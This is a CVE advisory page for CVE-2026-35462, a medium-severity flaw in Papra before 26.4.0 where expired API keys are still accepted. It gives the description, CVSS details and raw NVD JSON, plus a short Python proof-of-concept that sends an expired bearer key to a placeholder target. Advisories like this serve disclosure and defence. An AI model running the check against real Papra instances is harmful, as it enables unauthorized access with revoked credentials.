CVE-2026-35462

Description

Papra is a minimalistic document management and archiving platform. Prior to 26.4.0, API keys with an expiresAt date are never validated against the current time during authentication. Any API key — regardless of its expiration date — is accepted indefinitely, allowing a user whose key has expired to continue accessing all protected endpoints as if the key were still valid. This vulnerability is fixed in 26.4.0.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:papra:papra:*:*:*:*:*:*:*:* - VULNERABLE

Papra < 26.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL configuration
target_url = "https://target-papra-instance.com/api/documents"

# An expired API key (demonstration)
expired_api_key = "papra_key_expired_2024"

headers = {
    "Authorization": f"Bearer {expired_api_key}",
    "Content-Type": "application/json"
}

# Send request using the expired key
response = requests.get(target_url, headers=headers)

if response.status_code == 200:
    print("[+] Vulnerability Confirmed: Expired API key accepted.")
    print(f"[+] Response: {response.text}")
else:
    print("[-] Access Denied or Error.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35462
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35462
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35462/
[4] VulDB https://vuldb.com/cve/CVE-2026-35462
[5] https://github.com/papra-hq/papra/security/advisories/GHSA-866c-mc22-wvv5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35462", "sourceIdentifier": "[email protected]", "published": "2026-04-07T15:17:44.197", "lastModified": "2026-04-24T15:22:51.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Papra is a minimalistic document management and archiving platform. Prior to 26.4.0, API keys with an expiresAt date are never validated against the current time during authentication. Any API key — regardless of its expiration date — is accepted indefinitely, allowing a user whose key has expired to continue accessing all protected endpoints as if the key were still valid. This vulnerability is fixed in 26.4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:papra:papra:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4.0", "matchCriteriaId": "D2F10801-36E9-47AD-AD2D-DA4709B67B72"}]}]}], "references": [{"url": "https://github.com/papra-hq/papra/security/advisories/GHSA-866c-mc22-wvv5", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}]}}